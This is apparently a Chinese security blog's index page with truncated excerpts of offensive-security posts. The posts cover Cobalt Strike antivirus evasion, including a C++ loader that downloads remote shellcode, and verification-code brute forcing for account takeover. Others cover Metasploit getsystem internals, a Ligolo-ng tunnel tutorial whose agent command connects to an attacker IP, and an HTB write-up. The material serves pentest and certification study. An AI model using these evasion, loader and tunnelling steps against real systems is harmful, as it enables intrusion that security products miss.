动态逃逸杀软的艺术

本文首发于先知社区:https://xz.aliyun.com/news/15923 本文分享的动态逃逸杀软,主要聚焦在流量、内存、行为上进行规避,并且组合了间接系统调用、反调试、反沙箱等技术进一步对抗杀软,也为后续综合逃逸EDR/XDR打下良好的基础,测试使用企业版卡巴斯基、火绒6.0、360开启晶核状态,完整代码已经上传Github 流量规避 Cobalt Strike为了提供了非常灵活的流量调整,我们需要修改profile中的流量,我这里的配置修改了热门项目的4.9的内容,默认的jquery流量已经被杀毒和EDR标记严重,卡巴斯基对于这种流量是直接秒杀的,而且即使是启用https监听对于杀毒没有意义,杀毒安装的时候默认就把自己的根证书安装上了系统,所以是可以解密https,如下图 需要提前说明,如果VPS被沙箱和情报标记为恶意ip那无论怎么改流量都会秒杀,我搞了一下午发现无论怎么改都过不了卡巴的流量,后面注意到可能是我服务器ip被拉黑了 威胁原因是云保护,换个ip就行了: 为了修改流量,需要快速学习profile的语言,阅读文档,我们可以知道http-get部分是拉取请求服务要执行的内容,为了区分不同的beacon,metadata就是加密好的元数据,为了让metadata看起来不可疑,使用了base64url对元数据进行编码,同时用header指定了Cookie头,用prepend添加一些正常的数据 我们可以运行一下c2lint看看流量呈现的效果 ./c2lint endlessparadox.profile server是控制响应output字段,mask代表随机xor加密,base64放在后面会进一步编码加密的流量降低流量的熵值 大部分师傅都是做web出身应该很容易理解这些配置文件字段,流量效果如下,完全融入正常流量: 再看一下http-post,这部分是beacon发送执行命令和任务的结果,id来确定任务序列,output自然就是任务的结果,处理也就经过了mask加密和base64url编码 下面就是模拟的流量请求: 在原有的基础上修改还是比较容易,上面的流量就是我用bp抓取了B站的流量,借此模拟合法B站的请求,原版的github里面的请求对着一个静态资源发送POST请求确实是很可疑?师傅也可以抓取其他流量,按照正常的网站修改就好了。 分阶段的shellcode不会加密流量非常坑,同时为了避免空间绘测识别我的C2我关掉了host_stage,当c2lint所有检查通过之后就可以愉快的拉起cs去测试了 网络获取shellcode 为了分离shellcode和加载器,我使用内置windows api的InternetOpenA去获取远程服务中的shellcode std::vector<unsigned char> DownloadShellcode(const char* url) { std::vector<unsigned char> shellcode; HINTERNET hInternet = InternetOpenA("MyApp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); if (hInternet) { HINTERNET hUrl = InternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_KEEP_CONNECTION, 0); if (hUrl) { DWORD bytesRead = 0; const DWORD bufferSize = 4096; BYTE buffer[bufferSize]; while (InternetReadFile(hUrl, buffer, bufferSize, &bytesRead) && bytesRead !...

May 3, 2025 · 9 min · Theme PaperMod

验证码100%爆破接管任意用户攻击思路和数学分析

问题背景 起因是前段几个月有个渗透项目,对面web的后台没有验证码错误次数的校验,可以反复尝试,最终我不断获取验证码,利用FFUF天生的高并发速度直接搞到了一个账户的验证码,最终撕开web后台,进一步挖掘了后台的漏洞。当时很顺利,不超过两个小时就进入对面的web后台系统了。 我由此好奇,到底是这类攻击受到什么影响,这类攻击的成功率又如何?在现实成功的概率有多大?我们可以转化成一个数学背景,然后进行建模分析。 建模分析 6 位纯数字验证码(000000-999999,共 1,000,000 种可能)。 验证码 完全随机,每次获取都会变化。 有效期:5 分钟(可调整)。 爆破速度:1000 次/秒。 目标是计算 在不同时间窗口内的破解成功率,并探索 如果缩短验证码有效期而不影响 5 小时内的破解成功率。 数学分析 我的大学数学计算能力已经还给数学老师了,这里就偷个懒,问问GPT,看看O3的思维链的结论: 这个它公式的结论: 这是deepseek的计算结果: 题外插曲 没想到居然是100%,不过这倒是和我早年的SRC挖掘的实践情况一致,实际上,我几年前利用这类逻辑漏洞基本上能在2个小时直接就接管这类用户。如果运气够好,甚至第一次攻击即可接管。 插一句题外故事,今年年前还有刚入门的新人在我面前吹嘘自己SRC,说自己SRC排名很高,一问是挖的什么漏洞,还说TOP10的SQL注入、XSS,我内心都直想笑。不过想来没必要揭穿人家,毕竟给新人保留一点颜面,等到他们被毒打了才知道不容易。 据我所知,BAT、主流大厂收的SRC漏洞,基本上都是逻辑漏洞为主,RCE、SQL这类漏洞早10年或许可能有?现在”新人“再找这类基本就是痴人说梦,倒是听说过有些使用小0day交SRC,也就赚个零花钱;之余SRC百万赏金,怕不是得黑客技术修炼到”化神期“,修炼10年起步的老妖怪,或是大陆的天才才能到达的层次了。 更进一步 回到我们原题,既然和验证码有效期无关,我们就更关注速率来判断成功率了,并不是什么系统都能跑到1000个并发每秒的,让AI帮我们推导一下: 这个是deepseek的答案: 这个是gork3的答案: 看起来至少有两个错了,或者都错了,大模型的幻觉依然严重,到2025年依然不擅长解答复杂数学题,或者说任何稍微复杂的问题就不懂装懂了。不是数学专业,我也无法判定到底谁对错,算是简要分析了一下之前的攻击思路在数学逻辑的可能性。 总结 这类攻击方法也就对大集团、高并发的业务场景有用。更具体来说,根据我这几年经验,一般也就出现在JAVA、GO、RUST这种默认跑的飞快的web上,基本上2000个并发起步,甚至上万,倒是不用太关心概率问题,基本上就是100%,碰上IIS、PHP这种慢的和乌龟一样的,基本不用考虑, 这些的并发维持在一两百都是烧高香了。

May 3, 2025 · 1 min · Theme PaperMod

深入理解MSF之Getsystem

本文首发于先知社区 : https://xz.aliyun.com/news/12747 在渗透测试中,我们输入getsystem命令轻松就获得了一个system权限的shell,本文将解析幕后发生的工作流程和原理,了解了这些之后我们将以更加灵活的方式实现权限提升定制出我们需要的工具,并且更好的规避安全监测,在正式阅读之前,让我们简单学习一下几个概念辅助我们理解源码中的内容。 认识Windows访问控制模型 Window的访问控制模型如此复杂,以至于完全理解Windows权限是非常困难的,不过我们可以从宏观上做一个简单的理解: 当windows完成了身份认证(例如开启输入密码、rdp登录、匿名登录等等)会生成一份主的访问令牌(access token) 我们所有通过用户启动的进程都会有一份此访问令牌的副本,默认情况下,当进程的线程与安全对象(几乎所有的windows对象都是安全对象:文件、进程、服务等等)交互时,系统会使用主令牌 进程的线程可以模拟客户端帐户,模拟允许线程使用客户端的Access Token与安全对象交互,拿到的令牌称之为模拟令牌。 模拟客户端的线程同时具有主令牌和模拟令牌 你可能好奇Access Token到底是什么,我们可以简单理解为一个windows内核对象,里面包含着各种信息: 用户标识符(User Identifier):通常是一个唯一的账户安全标识符(SID),用于识别用户账户。 组标识符(Group Identifiers):用户所属的一组或多组的SIDs,它反映了用户在不同的组中的成员资格。 权限(Privileges):一个或多个权限,指明了线程所能执行的特定系统级操作(例如关机、改变系统时间、模拟客户端权限等)。 所有者(Owner):该令牌指定的默认所有者SID。在创建对象时,通常会被用作对象的所有者。 访问控制列表(DACL):指定哪些用户或组可以对对象执行何种操作。 登录会话(Logon Session):一个标识符,指关联到此访问令牌的登录会话。 这些信息在c++里面都有对应的数据结构类型,我们要操控获取Access Token的信息是非常容易的,举一个简单的例子,下面是微软官方文档用户标识的TOKEN_USER结构: typedef struct _TOKEN_USER { SID_AND_ATTRIBUTES User; } TOKEN_USER, *PTOKEN_USER; SID_AND_ATTRIBUTES类型的User里面包含着sid typedef struct _SID_AND_ATTRIBUTES { #if ... PISID Sid; #else PSID Sid; #endif DWORD Attributes; } SID_AND_ATTRIBUTES, *PSID_AND_ATTRIBUTES; 实现获取当下进程的用户的sid信息,同理其他信息也是一样的: // token.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。 // #include <iostream> #include <Windows.h> #include <processthreadsapi.h> #include <sddl.h> int main() { HANDLE hToken = NULL; BOOL bSuccess = FALSE; DWORD dwSize = 0; PTOKEN_USER pTokenUser = NULL; LPWSTR szSID = NULL; using namespace std; bSuccess = OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken); if (!...

April 3, 2025 · 6 min · Theme PaperMod

Ligolo-ng快速入门教程

ligolo-ng是最近很多人推荐,部分APT组织也在使用的VPN隧道代理工具,非常适用于OSCP考试或者红队演练。我注意到网上的教材和官方的文档都比较迷惑,也没说清楚怎么用,自己摸索出来了我自己认为最好的使用方法,就几分钟写一下,分享一下。(THE BEST! MY WAY IS THE BEST, HAAA!) 下载地址 官方下载地址:https://github.com/Nicocha30/ligolo-ng 编译好的有两种,一种是agent,是要放在我们攻陷的机器上的。另外一种是proxy,要放在我的本身的kali机器上,下好这两个。 简单原理 原理图如下,本身kali攻击会虚拟出一个网卡出来,然后再通过HTTP转发过去。我们虽然没有独立的ip地址,但是却像是再对面机器的内网一样,可以轻松访问其他机器。(嗯,说实话,隧道的网络我感觉不是很稳定,但是它主页的Performance表现很强) 建议如果要执行流量大的信息收集,比方说bloodhand那种,还是上传到机器A上执行,直接从本机收集DC的流量太大可能隧道就崩了,就很难受了。 实际搭建 在我们的kali机器上用root用户执行: ./proxy -selfcert 现在不管这个,在受害机器上执行: agent.exe -ignore-cert -connect 192.168.45.180:11601 等待一会就来了,选择 session 使用自动路由 autoroute 注意进入这个界面,然后使用键盘的上下控制上下,选中不是左右键盘,是空格。 回车,创建一个新的: y开启隧道转发: 搞定之后就能ping通内网了,延迟只能说卡的很,1000ms这难受了 意外情况 如果隧道崩了,就得老老实实删掉网卡,再执行一次。 ip address 找到这个工具创建的,再删掉它,避免后续路由冲突。 ip link delete suitableaioli 结论 本文应该讲的够清楚了,用来完成OSCP考试足够了。但是要是拿来打攻防ligolo-ng本身还需要进一步修改本身的流量特征,还有要解决本地攻击+VPS+受害机器的网络环境这类操作,后面有空研究一下再写吧。距离OSCP考试还有几天,说实话还是有些紧张,它NANA的,我不想找密码了,烦死了,找密码两个小时,渗透5分钟,这题目真的抽象。

April 3, 2025 · 1 min · Theme PaperMod

域靶场合集Write up HTB(下)

继续打几个找一下手感,感觉还不错,补充工具链和找一下手感差不多了。 Active 信息收集,Windows Server 2008 R2 SP1 (Domain: active.htb, Site: Default-First-Site-Name): ┌──(root㉿kali)-[/home/kali/Desktop] └─# nmap -v -sV -sC --top-ports 3000 --max-retries 0 10.10.10.100 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 22:01 EDT NSE: Loaded 156 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 22:01 Completed NSE at 22:01, 0.00s elapsed Initiating NSE at 22:01 Completed NSE at 22:01, 0.00s elapsed Initiating NSE at 22:01 Completed NSE at 22:01, 0.00s elapsed Initiating Ping Scan at 22:01 Scanning 10....

December 18, 2024 · 14 min · Theme PaperMod